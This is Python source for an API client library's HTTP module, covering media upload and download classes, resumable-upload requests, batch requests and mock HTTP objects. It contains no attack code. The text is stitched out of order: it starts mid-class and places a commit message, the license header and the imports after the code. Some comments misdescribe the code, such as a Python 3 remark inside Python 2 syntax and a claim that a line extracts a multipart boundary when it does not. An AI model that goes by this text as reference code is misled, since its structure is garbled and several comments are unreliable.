    if mimetype is None:
      # NOTE(review): guess_type() may return None for unknown extensions,
      # leaving mimetype() as None — confirm callers handle that.
      (mimetype, encoding) = mimetypes.guess_type(filename)
    self._mimetype = mimetype
    self._chunksize = chunksize
    self._resumable = resumable
  def chunksize(self):
    """Chunk size for resumable uploads.
    Returns:
      Chunk size in bytes.
    """
    return self._chunksize
  def mimetype(self):
    """Mime type of the body.
    Returns:
      Mime type.
    """
    return self._mimetype
  def size(self):
    """Size of upload.
    Returns:
      Size of the body, or None of the size is unknown.
    """
    return self._size
  def resumable(self):
    """Whether this upload is resumable.
    Returns:
      True if resumable upload or False.
    """
    return self._resumable
  def getbytes(self, begin, length):
    """Get bytes from the media.
    Args:
      begin: int, offset from beginning of file.
      length: int, number of bytes to read, starting at begin.
    Returns:
      A string of bytes read. May be shorted than length if EOF was reached
      first.
    """
    # NOTE(review): the handle is opened on first use and never closed;
    # it lives for the lifetime of this object.
    if self._fd is None:
      self._fd = open(self._filename, 'rb')
    self._fd.seek(begin)
    return self._fd.read(length)
  def to_json(self):
    """Creating a JSON representation of an instance of MediaFileUpload.
    Returns:
      string, a JSON representation of this instance, suitable to pass to
      from_json().
    """
    # The open file handle cannot be serialized; strip it from the JSON.
    return self._to_json(['_fd'])
  @staticmethod
  def from_json(s):
    # Rebuild the upload from to_json() output; the file itself is
    # re-opened lazily on the next getbytes() call.
    d = simplejson.loads(s)
    return MediaFileUpload(
        d['_filename'], d['_mimetype'], d['_chunksize'], d['_resumable'])
class MediaIoBaseUpload(MediaUpload):
  """A MediaUpload for a io.Base objects.
  Note that the Python file object is compatible with io.Base and can be used
  with this class also.
    fh = io.BytesIO('...Some data to upload...')
    media = MediaIoBaseUpload(fh, mimetype='image/png',
      chunksize=1024*1024, resumable=True)
    farm.animals().insert(
        id='cow',
        name='cow.png',
        media_body=media).execute()
  """
  def __init__(self, fd, mimetype, chunksize=DEFAULT_CHUNK_SIZE,
      resumable=False):
    """Constructor.
    Args:
      fd: io.Base or file object, The source of the bytes to upload. MUST be
        opened in blocking mode, do not use streams opened in non-blocking mode.
      mimetype: string, Mime-type of the file. If None then a mime-type will be
        guessed from the file extension.
      chunksize: int, File will be uploaded in chunks of this many bytes. Only
        used if resumable=True.
      resumable: bool, True if this is a resumable upload. False means upload
        in a single request.
    """
    self._fd = fd
    self._mimetype = mimetype
    self._chunksize = chunksize
    self._resumable = resumable
    # Try to discover the stream size via fstat(); when the stream has no
    # usable file descriptor, the size stays None (unknown).
    self._size = None
    try:
      if hasattr(self._fd, 'fileno'):
        fileno = self._fd.fileno()
        # Pipes and such show up as 0 length files.
        size = os.fstat(fileno).st_size
        if size:
          self._size = os.fstat(fileno).st_size
    except IOError:
      # In-memory streams (e.g. io.BytesIO) raise from fileno().
      pass
  def chunksize(self):
    """Chunk size for resumable uploads.
    Returns:
      Chunk size in bytes.
    """
    return self._chunksize
  def mimetype(self):
    """Mime type of the body.
    Returns:
      Mime type.
    """
    return self._mimetype
  def size(self):
    """Size of upload.
    Returns:
      Size of the body, or None of the size is unknown.
    """
    return self._size
  def resumable(self):
    """Whether this upload is resumable.
    Returns:
      True if resumable upload or False.
    """
    return self._resumable
  def getbytes(self, begin, length):
    """Get bytes from the media.
    Args:
      begin: int, offset from beginning of file.
      length: int, number of bytes to read, starting at begin.
    Returns:
      A string of bytes read. May be shorted than length if EOF was reached
      first.
    """
    self._fd.seek(begin)
    return self._fd.read(length)
  def to_json(self):
    """This upload type is not serializable."""
    # An arbitrary stream cannot be reconstructed from JSON.
    raise NotImplementedError('MediaIoBaseUpload is not serializable.')
class MediaInMemoryUpload(MediaUpload):
  """MediaUpload for a chunk of bytes.

  Construct a MediaInMemoryUpload and pass as the media_body parameter of the
  method.
  """

  def __init__(self, body, mimetype='application/octet-stream',
               chunksize=DEFAULT_CHUNK_SIZE, resumable=False):
    """Create a new MediaInMemoryUpload.

    Args:
      body: string, Bytes of body content.
      mimetype: string, Mime-type of the file or default of
        'application/octet-stream'.
      chunksize: int, File will be uploaded in chunks of this many bytes. Only
        used if resumable=True.
      resumable: bool, True if this is a resumable upload. False means upload
        in a single request.
    """
    self._body = body
    self._mimetype = mimetype
    self._resumable = resumable
    self._chunksize = chunksize

  def chunksize(self):
    """Chunk size for resumable uploads.

    Returns:
      Chunk size in bytes.
    """
    return self._chunksize

  def mimetype(self):
    """Mime type of the body.

    Returns:
      Mime type.
    """
    return self._mimetype

  def size(self):
    """Size of upload.

    Returns:
      Size of the body, which is always known for an in-memory upload.
    """
    return len(self._body)

  def resumable(self):
    """Whether this upload is resumable.

    Returns:
      True if resumable upload or False.
    """
    return self._resumable

  def getbytes(self, begin, length):
    """Get bytes from the media.

    Args:
      begin: int, offset from beginning of file.
      length: int, number of bytes to read, starting at begin.

    Returns:
      A string of bytes read. May be shorter than length if EOF was reached
      first.
    """
    return self._body[begin:begin + length]

  def to_json(self):
    """Create a JSON representation of a MediaInMemoryUpload.

    Returns:
      string, a JSON representation of this instance, suitable to pass to
      from_json().
    """
    t = type(self)
    d = copy.copy(self.__dict__)
    del d['_body']
    d['_class'] = t.__name__
    d['_module'] = t.__module__
    # Raw bytes are not JSON-safe, so ship the body base64-encoded instead.
    d['_b64body'] = base64.b64encode(self._body)
    return simplejson.dumps(d)

  @staticmethod
  def from_json(s):
    """Reconstruct a MediaInMemoryUpload from its to_json() representation."""
    d = simplejson.loads(s)
    return MediaInMemoryUpload(base64.b64decode(d['_b64body']),
                               d['_mimetype'], d['_chunksize'],
                               d['_resumable'])
class MediaIoBaseDownload(object):
  """Download media resources.

  Note that the Python file object is compatible with io.Base and can be used
  with this class also.


  Example:
    request = farms.animals().get_media(id='cow')
    fh = io.FileIO('cow.png', mode='wb')
    downloader = MediaIoBaseDownload(fh, request, chunksize=1024*1024)

    done = False
    while done is False:
      status, done = downloader.next_chunk()
      if status:
        print "Download %d%%." % int(status.progress() * 100)
    print "Download Complete!"
  """

  def __init__(self, fd, request, chunksize=DEFAULT_CHUNK_SIZE):
    """Constructor.

    Args:
      fd: io.Base or file object, The stream in which to write the downloaded
        bytes.
      request: apiclient.http.HttpRequest, the media request to perform in
        chunks.
      chunksize: int, File will be downloaded in chunks of this many bytes.
    """
    self._fd = fd
    self._request = request
    self._uri = request.uri
    self._chunksize = chunksize
    self._progress = 0
    # Unknown until the server reports it in a Content-Range header.
    self._total_size = None
    self._done = False

  def next_chunk(self):
    """Get the next chunk of the download.

    Returns:
      (status, done): (MediaDownloadStatus, boolean)
         The value of 'done' will be True when the media has been fully
         downloaded.

    Raises:
      apiclient.errors.HttpError if the response was not a 2xx.
      httplib2.Error if a transport error has occured.
    """
    # HTTP byte ranges are inclusive of both endpoints (RFC 7233), so the
    # upper bound is chunksize - 1; without the -1 each request would fetch
    # one byte more than the configured chunk size.
    headers = {
        'range': 'bytes=%d-%d' % (
            self._progress, self._progress + self._chunksize - 1)
        }
    http = self._request.http
    # Handle redirects manually so the redirected-to URI is remembered and
    # reused for subsequent chunks.
    http.follow_redirects = False

    resp, content = http.request(self._uri, headers=headers)
    if resp.status in [301, 302, 303, 307, 308] and 'location' in resp:
      self._uri = resp['location']
      resp, content = http.request(self._uri, headers=headers)
    if resp.status in [200, 206]:
      self._progress += len(content)
      self._fd.write(content)

      if 'content-range' in resp:
        content_range = resp['content-range']
        length = content_range.rsplit('/', 1)[1]
        self._total_size = int(length)

      # NOTE(review): if the server replies 200 with the full body and no
      # Content-Range header, _done is never set -- TODO confirm callers
      # never hit that case.
      if self._progress == self._total_size:
        self._done = True
      return MediaDownloadProgress(self._progress, self._total_size), self._done
    else:
      raise HttpError(resp, content, self._uri)
class HttpRequest(object):
  """Encapsulates a single HTTP request."""

  def __init__(self, http, postproc, uri,
               method='GET',
               body=None,
               headers=None,
               methodId=None,
               resumable=None):
    """Constructor for an HttpRequest.

    Args:
      http: httplib2.Http, the transport object to use to make a request
      postproc: callable, called on the HTTP response and content to transform
        it into a data object before returning, or raising an exception
        on an error.
      uri: string, the absolute URI to send the request to
      method: string, the HTTP method to use
      body: string, the request body of the HTTP request,
      headers: dict, the HTTP request headers
      methodId: string, a unique identifier for the API method being called.
      resumable: MediaUpload, None if this is not a resumable request.
    """
    self.uri = uri
    self.method = method
    self.body = body
    self.headers = headers or {}
    self.methodId = methodId
    self.http = http
    self.postproc = postproc
    self.resumable = resumable
    # Set to True after a transport error while uploading a chunk; makes
    # next_chunk() first ask the server how many bytes it actually received.
    self._in_error_state = False

    # Pull the multipart boundary out of the content-type header.
    # NOTE(review): the parsed (major, minor, params) values are not used
    # below -- presumably kept for the parse's validation side effect; TODO
    # confirm.
    major, minor, params = mimeparse.parse_mime_type(
        headers.get('content-type', 'application/json'))

    # The size of the non-media part of the request.
    self.body_size = len(self.body or '')

    # The resumable URI to send chunks to.
    self.resumable_uri = None

    # The bytes that have been uploaded.
    self.resumable_progress = 0

  def execute(self, http=None):
    """Execute the request.

    Args:
      http: httplib2.Http, an http object to be used in place of the
        one the HttpRequest request object was constructed with.

    Returns:
      A deserialized object model of the response body as determined
      by the postproc.

    Raises:
      apiclient.errors.HttpError if the response was not a 2xx.
      httplib2.Error if a transport error has occured.
    """
    if http is None:
      http = self.http
    if self.resumable:
      # Resumable uploads are driven chunk by chunk; next_chunk() returns a
      # non-None body only once the upload is complete.
      body = None
      while body is None:
        _, body = self.next_chunk(http)
      return body
    else:
      if 'content-length' not in self.headers:
        self.headers['content-length'] = str(self.body_size)
      resp, content = http.request(self.uri, self.method,
                                   body=self.body,
                                   headers=self.headers)

      if resp.status >= 300:
        raise HttpError(resp, content, self.uri)
      return self.postproc(resp, content)

  def next_chunk(self, http=None):
    """Execute the next step of a resumable upload.

    Can only be used if the method being executed supports media uploads and
    the MediaUpload object passed in was flagged as using resumable upload.

    Example:

      media = MediaFileUpload('cow.png', mimetype='image/png',
                              chunksize=1000, resumable=True)
      request = farm.animals().insert(
          id='cow',
          name='cow.png',
          media_body=media)

      response = None
      while response is None:
        status, response = request.next_chunk()
        if status:
          print "Upload %d%% complete." % int(status.progress() * 100)

    Returns:
      (status, body): (ResumableMediaStatus, object)
         The body will be None until the resumable media is fully uploaded.

    Raises:
      apiclient.errors.HttpError if the response was not a 2xx.
      httplib2.Error if a transport error has occured.
    """
    if http is None:
      http = self.http

    # '*' tells the server that the total upload size is not yet known.
    if self.resumable.size() is None:
      size = '*'
    else:
      size = str(self.resumable.size())

    if self.resumable_uri is None:
      # First call: start the resumable session. The server replies with the
      # session URI that every subsequent chunk must be PUT to.
      start_headers = copy.copy(self.headers)
      start_headers['X-Upload-Content-Type'] = self.resumable.mimetype()
      if size != '*':
        start_headers['X-Upload-Content-Length'] = size
      start_headers['content-length'] = str(self.body_size)

      resp, content = http.request(self.uri, self.method,
                                   body=self.body,
                                   headers=start_headers)
      if resp.status == 200 and 'location' in resp:
        self.resumable_uri = resp['location']
      else:
        raise ResumableUploadError("Failed to retrieve starting URI.")
    elif self._in_error_state:
      # If we are in an error state then query the server for current state of
      # the upload by sending an empty PUT and reading the 'range' header in
      # the response.
      headers = {
          'Content-Range': 'bytes */%s' % size,
          'content-length': '0'
          }
      resp, content = http.request(self.resumable_uri, 'PUT',
                                   headers=headers)
      status, body = self._process_response(resp, content)
      if body:
        # The upload was complete.
        return (status, body)

    data = self.resumable.getbytes(
        self.resumable_progress, self.resumable.chunksize())

    # A short read implies that we are at EOF, so finish the upload.
    if len(data) < self.resumable.chunksize():
      size = str(self.resumable_progress + len(data))

    headers = {
        'Content-Range': 'bytes %d-%d/%s' % (
            self.resumable_progress, self.resumable_progress + len(data) - 1,
            size)
        }
    try:
      resp, content = http.request(self.resumable_uri, 'PUT',
                                   body=data,
                                   headers=headers)
    except:
      # Remember the failure so the next call re-syncs with the server before
      # sending more data.
      self._in_error_state = True
      raise

    return self._process_response(resp, content)

  def _process_response(self, resp, content):
    """Process the response from a single chunk upload.

    Args:
      resp: httplib2.Response, the response object.
      content: string, the content of the response.

    Returns:
      (status, body): (ResumableMediaStatus, object)
         The body will be None until the resumable media is fully uploaded.

    Raises:
      apiclient.errors.HttpError if the response was not a 2xx or a 308.
    """
    if resp.status in [200, 201]:
      self._in_error_state = False
      return None, self.postproc(resp, content)
    elif resp.status == 308:
      self._in_error_state = False
      # A "308 Resume Incomplete" indicates we are not done.
      # The server's 'range' header reports the last byte received; resume
      # from the byte after it.
      self.resumable_progress = int(resp['range'].split('-')[1]) + 1
      if 'location' in resp:
        self.resumable_uri = resp['location']
    else:
      self._in_error_state = True
      raise HttpError(resp, content, self.uri)

    return (MediaUploadProgress(self.resumable_progress, self.resumable.size()),
            None)

  def to_json(self):
    """Returns a JSON representation of the HttpRequest."""
    d = copy.copy(self.__dict__)
    if d['resumable'] is not None:
      d['resumable'] = self.resumable.to_json()
    # The transport and postproc callables are not serializable; the caller
    # re-supplies them in from_json().
    del d['http']
    del d['postproc']
    return simplejson.dumps(d)

  @staticmethod
  def from_json(s, http, postproc):
    """Returns an HttpRequest populated with info from a JSON object."""
    d = simplejson.loads(s)
    if d['resumable'] is not None:
      d['resumable'] = MediaUpload.new_from_json(d['resumable'])
    return HttpRequest(
        http,
        postproc,
        uri=d['uri'],
        method=d['method'],
        body=d['body'],
        headers=d['headers'],
        methodId=d['methodId'],
        resumable=d['resumable'])
class BatchHttpRequest(object):
  """Batches multiple HttpRequest objects into a single HTTP request.

  Example:
    from apiclient.http import BatchHttpRequest

    def list_animals(request_id, response, exception):
      \"\"\"Do something with the animals list response.\"\"\"
      if exception is not None:
        # Do something with the exception.
        pass
      else:
        # Do something with the response.
        pass

    def list_farmers(request_id, response, exception):
      \"\"\"Do something with the farmers list response.\"\"\"
      if exception is not None:
        # Do something with the exception.
        pass
      else:
        # Do something with the response.
        pass

    service = build('farm', 'v2')

    batch = BatchHttpRequest()

    batch.add(service.animals().list(), list_animals)
    batch.add(service.farmers().list(), list_farmers)
    batch.execute(http)
  """

  def __init__(self, callback=None, batch_uri=None):
    """Constructor for a BatchHttpRequest.

    Args:
      callback: callable, A callback to be called for each response, of the
        form callback(id, response, exception). The first parameter is the
        request id, and the second is the deserialized response object. The
        third is an apiclient.errors.HttpError exception object if an HTTP
        error occurred while processing the request, or None if no error
        occurred.
      batch_uri: string, URI to send batch requests to.
    """
    if batch_uri is None:
      batch_uri = 'https://www.googleapis.com/batch'
    self._batch_uri = batch_uri

    # Global callback to be called for each individual response in the batch.
    self._callback = callback

    # A map from id to request.
    self._requests = {}

    # A map from id to callback.
    self._callbacks = {}

    # List of request ids, in the order in which they were added.
    self._order = []

    # The last auto generated id.
    self._last_auto_id = 0

    # Unique ID on which to base the Content-ID headers.
    self._base_id = None

    # A map from request id to (httplib2.Response, content) response pairs
    self._responses = {}

    # A map of id(Credentials) that have been refreshed.
    self._refreshed_credentials = {}

  def _refresh_and_apply_credentials(self, request, http):
    """Refresh the credentials and apply to the request.

    Args:
      request: HttpRequest, the request.
      http: httplib2.Http, the global http object for the batch.
    """
    # For the credentials to refresh, but only once per refresh_token
    # If there is no http per the request then refresh the http passed in
    # via execute()
    creds = None
    if request.http is not None and hasattr(request.http.request,
        'credentials'):
      creds = request.http.request.credentials
    elif http is not None and hasattr(http.request, 'credentials'):
      creds = http.request.credentials
    if creds is not None:
      # Refresh each distinct Credentials object at most once per batch.
      if id(creds) not in self._refreshed_credentials:
        creds.refresh(http)
        self._refreshed_credentials[id(creds)] = 1

      # Only apply the credentials if we are using the http object passed in,
      # otherwise apply() will get called during _serialize_request().
      if request.http is None or not hasattr(request.http.request,
          'credentials'):
        creds.apply(request.headers)

  def _id_to_header(self, id_):
    """Convert an id to a Content-ID header value.

    Args:
      id_: string, identifier of individual request.

    Returns:
      A Content-ID header with the id_ encoded into it. A UUID is prepended to
      the value because Content-ID headers are supposed to be universally
      unique.
    """
    if self._base_id is None:
      self._base_id = uuid.uuid4()

    return '<%s+%s>' % (self._base_id, urllib.quote(id_))

  def _header_to_id(self, header):
    """Convert a Content-ID header value to an id.

    Presumes the Content-ID header conforms to the format that
    _id_to_header() returns.

    Args:
      header: string, Content-ID header value.

    Returns:
      The extracted id value.

    Raises:
      BatchError if the header is not in the expected format.
    """
    if header[0] != '<' or header[-1] != '>':
      raise BatchError("Invalid value for Content-ID: %s" % header)
    if '+' not in header:
      raise BatchError("Invalid value for Content-ID: %s" % header)
    base, id_ = header[1:-1].rsplit('+', 1)

    return urllib.unquote(id_)

  def _serialize_request(self, request):
    """Convert an HttpRequest object into a string.

    Args:
      request: HttpRequest, the request to serialize.

    Returns:
      The request as a string in application/http format.
    """
    # Construct status line
    parsed = urlparse.urlparse(request.uri)
    # Rebuild the URI without scheme and host; the batch endpoint only wants
    # the path, params and query of each part.
    request_line = urlparse.urlunparse(
        (None, None, parsed.path, parsed.params, parsed.query, None)
        )
    status_line = request.method + ' ' + request_line + ' HTTP/1.1\n'
    major, minor = request.headers.get('content-type', 'application/json').split('/')
    msg = MIMENonMultipart(major, minor)
    headers = request.headers.copy()

    if request.http is not None and hasattr(request.http.request,
        'credentials'):
      request.http.request.credentials.apply(headers)

    # MIMENonMultipart adds its own Content-Type header.
    if 'content-type' in headers:
      del headers['content-type']

    for key, value in headers.iteritems():
      msg[key] = value
    msg['Host'] = parsed.netloc
    msg.set_unixfrom(None)

    if request.body is not None:
      msg.set_payload(request.body)
      msg['content-length'] = str(len(request.body))

    # Serialize the mime message.
    fp = StringIO.StringIO()
    # maxheaderlen=0 means don't line wrap headers.
    g = Generator(fp, maxheaderlen=0)
    g.flatten(msg, unixfrom=False)
    body = fp.getvalue()

    # Strip off the \n\n that the MIME lib tacks onto the end of the payload.
    if request.body is None:
      body = body[:-2]

    return status_line.encode('utf-8') + body

  def _deserialize_response(self, payload):
    """Convert string into httplib2 response and content.

    Args:
      payload: string, headers and body as a string.

    Returns:
      A pair (resp, content), such as would be returned from httplib2.request.
    """
    # Strip off the status line
    status_line, payload = payload.split('\n', 1)
    protocol, status, reason = status_line.split(' ', 2)

    # Parse the rest of the response
    parser = FeedParser()
    parser.feed(payload)
    msg = parser.close()
    msg['status'] = status

    # Create httplib2.Response from the parsed headers.
    resp = httplib2.Response(msg)
    resp.reason = reason
    # e.g. 'HTTP/1.1' -> version 11.
    resp.version = int(protocol.split('/', 1)[1].replace('.', ''))

    content = payload.split('\r\n\r\n', 1)[1]

    return resp, content

  def _new_id(self):
    """Create a new id.

    Auto incrementing number that avoids conflicts with ids already used.

    Returns:
       string, a new unique id.
    """
    self._last_auto_id += 1
    # Skip over any ids the caller already supplied explicitly.
    while str(self._last_auto_id) in self._requests:
      self._last_auto_id += 1

    return str(self._last_auto_id)

  def add(self, request, callback=None, request_id=None):
    """Add a new request.

    Every callback added will be paired with a unique id, the request_id.
    That unique id will be passed back to the callback when the response
    comes back from the server. The default behavior is to have the library
    generate its own unique id. If the caller passes in a request_id then
    they must ensure uniqueness for each request_id, and if they are not an
    exception is raised. Callers should either supply all request_ids or
    never supply a request id, to avoid such an error.

    Args:
      request: HttpRequest, Request to add to the batch.
      callback: callable, A callback to be called for this response, of the
        form callback(id, response, exception). The first parameter is the
        request id, and the second is the deserialized response object. The
        third is an apiclient.errors.HttpError exception object if an HTTP
        error occurred while processing the request, or None if no errors
        occurred.
      request_id: string, A unique id for the request. The id will be passed
        to the callback with the response.

    Returns:
      None

    Raises:
      BatchError if a media request is added to a batch.
      KeyError is the request_id is not unique.
    """
    if request_id is None:
      request_id = self._new_id()
    if request.resumable is not None:
      raise BatchError("Media requests cannot be used in a batch request.")
    if request_id in self._requests:
      raise KeyError("A request with this ID already exists: %s" % request_id)
    self._requests[request_id] = request
    self._callbacks[request_id] = callback
    self._order.append(request_id)

  def _execute(self, http, order, requests):
    """Serialize batch request, send to server, process response.

    Args:
      http: httplib2.Http, an http object to be used to make the request with.
      order: list, list of request ids in the order they were added to the
        batch.
      request: list, list of request objects to send.

    Raises:
      httplib2.Error if a transport error has occured.
      apiclient.errors.BatchError if the response is the wrong format.
    """
    message = MIMEMultipart('mixed')
    # Message should not write out its own headers.
    setattr(message, '_write_headers', lambda self: None)

    # Add all the individual requests.
    for request_id in order:
      request = requests[request_id]

      msg = MIMENonMultipart('application', 'http')
      msg['Content-Transfer-Encoding'] = 'binary'
      msg['Content-ID'] = self._id_to_header(request_id)

      body = self._serialize_request(request)
      msg.set_payload(body)
      message.attach(msg)

    body = message.as_string()

    headers = {}
    headers['content-type'] = ('multipart/mixed; '
                               'boundary="%s"') % message.get_boundary()

    resp, content = http.request(self._batch_uri, 'POST', body=body,
                                 headers=headers)

    if resp.status >= 300:
      raise HttpError(resp, content, self._batch_uri)

    # Now break out the individual responses and store each one.
    boundary, _ = content.split(None, 1)

    # Prepend with a content-type header so FeedParser can handle it.
    header = 'content-type: %s\r\n\r\n' % resp['content-type']
    for_parser = header + content

    parser = FeedParser()
    parser.feed(for_parser)
    mime_response = parser.close()

    if not mime_response.is_multipart():
      raise BatchError("Response not in multipart/mixed format.", resp,
          content)

    for part in mime_response.get_payload():
      request_id = self._header_to_id(part['Content-ID'])
      response, content = self._deserialize_response(part.get_payload())
      self._responses[request_id] = (response, content)

  def execute(self, http=None):
    """Execute all the requests as a single batched HTTP request.

    Args:
      http: httplib2.Http, an http object to be used in place of the one the
        HttpRequest request object was constructed with. If one isn't
        supplied then use a http object from the requests in this batch.

    Returns:
      None

    Raises:
      httplib2.Error if a transport error has occured.
      apiclient.errors.BatchError if the response is the wrong format.
    """
    # If http is not supplied use the first valid one given in the requests.
    if http is None:
      for request_id in self._order:
        request = self._requests[request_id]
        if request is not None:
          http = request.http
          break

    if http is None:
      raise ValueError("Missing a valid http object.")

    self._execute(http, self._order, self._requests)

    # Loop over all the requests and check for 401s. For each 401 request the
    # credentials should be refreshed and then sent again in a separate batch.
    redo_requests = {}
    redo_order = []

    for request_id in self._order:
      resp, content = self._responses[request_id]
      if resp['status'] == '401':
        redo_order.append(request_id)
        request = self._requests[request_id]
        self._refresh_and_apply_credentials(request, http)
        redo_requests[request_id] = request

    if redo_requests:
      self._execute(http, redo_order, redo_requests)

    # Now process all callbacks that are erroring, and raise an exception for
    # ones that return a non-2xx response? Or add extra parameter to callback
    # that contains an HttpError?
    for request_id in self._order:
      resp, content = self._responses[request_id]

      request = self._requests[request_id]
      callback = self._callbacks[request_id]

      response = None
      exception = None
      try:
        if resp.status >= 300:
          raise HttpError(resp, content, request.uri)
        response = request.postproc(resp, content)
      except HttpError, e:
        exception = e

      if callback is not None:
        callback(request_id, response, exception)
      if self._callback is not None:
        self._callback(request_id, response, exception)
class HttpRequestMock(object):
  """Mock of HttpRequest.

  Do not construct directly, instead use RequestMockBuilder.
  """

  def __init__(self, resp, content, postproc):
    """Constructor for HttpRequestMock

    Args:
      resp: httplib2.Response, the response to emulate coming from the request
      content: string, the response body
      postproc: callable, the post processing function usually supplied by
                the model class. See model.JsonModel.response() as an example.
    """
    # A missing response defaults to a plain 200 OK.
    if resp is None:
      resp = httplib2.Response({'status': 200, 'reason': 'OK'})
    self.resp = resp
    self.content = content
    self.postproc = postproc
    if 'reason' in self.resp:
      self.resp.reason = self.resp['reason']

  def execute(self, http=None):
    """Execute the request.

    Same behavior as HttpRequest.execute(), but the response is
    mocked and not really from an HTTP request/response.
    """
    return self.postproc(self.resp, self.content)
class RequestMockBuilder(object):
  """A simple mock of HttpRequest

  Pass in a dictionary to the constructor that maps request methodIds to
  tuples of (httplib2.Response, content, opt_expected_body) that should be
  returned when that method is called. None may also be passed in for the
  httplib2.Response, in which case a 200 OK response will be generated.
  If an opt_expected_body (str or dict) is provided, it will be compared to
  the body and UnexpectedBodyError will be raised on inequality.

  Example:
    response = '{"data": {"id": "tag:google.c...'
    requestBuilder = RequestMockBuilder(
      {
        'plus.activities.get': (None, response),
      }
    )
    apiclient.discovery.build("plus", "v1", requestBuilder=requestBuilder)

  Methods that you do not supply a response for will return a
  200 OK with an empty string as the response content or raise an excpetion
  if check_unexpected is set to True. The methodId is taken from the rpcName
  in the discovery document.

  For more details see the project wiki.
  """

  def __init__(self, responses, check_unexpected=False):
    """Constructor for RequestMockBuilder

    The constructed object should be a callable object
    that can replace the class HttpResponse.

    responses - A dictionary that maps methodIds into tuples
                of (httplib2.Response, content). The methodId
                comes from the 'rpcName' field in the discovery
                document.
    check_unexpected - A boolean setting whether or not UnexpectedMethodError
                       should be raised on unsupplied method.
    """
    self.responses = responses
    self.check_unexpected = check_unexpected

  def __call__(self, http, postproc, uri, method='GET', body=None,
               headers=None, methodId=None, resumable=None):
    """Implements the callable interface that discovery.build() expects
    of requestBuilder, which is to build an object compatible with
    HttpRequest.execute(). See that method for the description of the
    parameters and the expected response.
    """
    # Unknown methods either fail loudly or fall back to an empty 200 OK.
    if methodId not in self.responses:
      if self.check_unexpected:
        raise UnexpectedMethodError(methodId)
      model = JsonModel(False)
      return HttpRequestMock(None, '{}', model.response)

    canned = self.responses[methodId]
    resp, content = canned[:2]
    if len(canned) > 2:
      # Test the body against the supplied expected_body.
      expected_body = canned[2]
      if bool(expected_body) != bool(body):
        # Not expecting a body and provided one
        # or expecting a body and not provided one.
        raise UnexpectedBodyError(expected_body, body)
      if isinstance(expected_body, str):
        expected_body = simplejson.loads(expected_body)
      body = simplejson.loads(body)
      if body != expected_body:
        raise UnexpectedBodyError(expected_body, body)
    return HttpRequestMock(resp, content, postproc)
class HttpMock(object):
  """Mock of httplib2.Http"""

  def __init__(self, filename, headers=None):
    """
    Args:
      filename: string, absolute filename to read response from
      headers: dict, header to return with response
    """
    if headers is None:
      headers = {'status': '200 OK'}
    # Use open() in a context manager: the py2-only file() builtin is gone in
    # py3, and the old code leaked the handle if read() raised.
    with open(filename, 'r') as f:
      self.data = f.read()
    self.headers = headers

  def request(self, uri,
              method='GET',
              body=None,
              headers=None,
              redirections=1,
              connection_type=None):
    """Return the canned headers and file contents for every request."""
    return httplib2.Response(self.headers), self.data
class HttpMockSequence(object):
  """Mock of httplib2.Http

  Mocks a sequence of calls to request returning different responses for each
  call. Create an instance initialized with the desired response headers
  and content and then use as if an httplib2.Http instance.

    http = HttpMockSequence([
      ({'status': '401'}, ''),
      ({'status': '200'}, '{"access_token":"1/3w","expires_in":3600}'),
      ({'status': '200'}, 'echo_request_headers'),
      ])
    resp, content = http.request("http://examples.com")

  There are special values you can pass in for content to trigger
  behavours that are helpful in testing.

  'echo_request_headers' means return the request headers in the response body
  'echo_request_headers_as_json' means return the request headers in
     the response body
  'echo_request_body' means return the request body in the response body
  'echo_request_uri' means return the request uri in the response body
  """

  def __init__(self, iterable):
    """
    Args:
      iterable: iterable, a sequence of pairs of (headers, body)
    """
    self._iterable = iterable
    self.follow_redirects = True

  def request(self, uri,
              method='GET',
              body=None,
              headers=None,
              redirections=1,
              connection_type=None):
    """Pop and return the next canned response in the sequence."""
    resp_headers, content = self._iterable.pop(0)
    # A few magic content values echo parts of the request back, which makes
    # test assertions about the outgoing request easy to write.
    if content == 'echo_request_uri':
      content = uri
    elif content == 'echo_request_body':
      content = body
    elif content == 'echo_request_headers':
      content = headers
    elif content == 'echo_request_headers_as_json':
      content = simplejson.dumps(headers)
    return httplib2.Response(resp_headers), content
def set_user_agent(http, user_agent):
  """Set the user-agent on every request.

  Args:
     http - An instance of httplib2.Http
         or something that acts like it.
     user_agent: string, the value for the user-agent header.

  Returns:
     A modified instance of http that was passed in.

  Example:

    h = httplib2.Http()
    h = set_user_agent(h, "my-app-name/6.0")

  Most of the time the user-agent will be set doing auth, this is for the rare
  cases where you are accessing an unauthenticated endpoint.
  """
  wrapped = http.request

  # The closure that will replace 'httplib2.Http.request'.
  def new_request(uri, method='GET', body=None, headers=None,
                  redirections=httplib2.DEFAULT_MAX_REDIRECTS,
                  connection_type=None):
    """Inject the user-agent header, then delegate to the wrapped request."""
    if headers is None:
      headers = {}
    # Prepend our agent to any user-agent the caller already supplied.
    if 'user-agent' in headers:
      headers['user-agent'] = user_agent + ' ' + headers['user-agent']
    else:
      headers['user-agent'] = user_agent
    return wrapped(uri, method, body, headers,
                   redirections, connection_type)

  http.request = new_request
  return http
def tunnel_patch(http):
  """Tunnel PATCH requests over POST.

  Args:
     http - An instance of httplib2.Http
         or something that acts like it.

  Returns:
     A modified instance of http that was passed in.

  Example:

    h = httplib2.Http()
    h = tunnel_patch(h)

  Useful if you are running on a platform that doesn't support PATCH.
  Apply this last if you are using OAuth 1.0, as changing the method
  will result in a different signature.
  """
  request_orig = http.request

  # The closure that will replace 'httplib2.Http.request'.
  def new_request(uri, method='GET', body=None, headers=None,
                  redirections=httplib2.DEFAULT_MAX_REDIRECTS,
                  connection_type=None):
    """Rewrite PATCH requests as POST with an X-HTTP-Method-Override header."""
    if headers is None:
      headers = {}
    if method == 'PATCH':
      if 'oauth_token' in headers.get('authorization', ''):
        logging.warning(
            'OAuth 1.0 request made with Credentials after tunnel_patch.')
      headers['x-http-method-override'] = "PATCH"
      method = 'POST'
    resp, content = request_orig(uri, method, body, headers,
                                 redirections, connection_type)
    return resp, content

  http.request = new_request
  return http
Fix comments to match reality. Fixes issue #170.
# Copyright (C) 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Classes to encapsulate a single HTTP request.
The classes implement a command pattern, with every
object supporting an execute() method that does the
actual HTTP request.
"""
__author__ = 'jcgregorio@google.com (Joe Gregorio)'
import StringIO
import base64
import copy
import gzip
import httplib2
import mimeparse
import mimetypes
import os
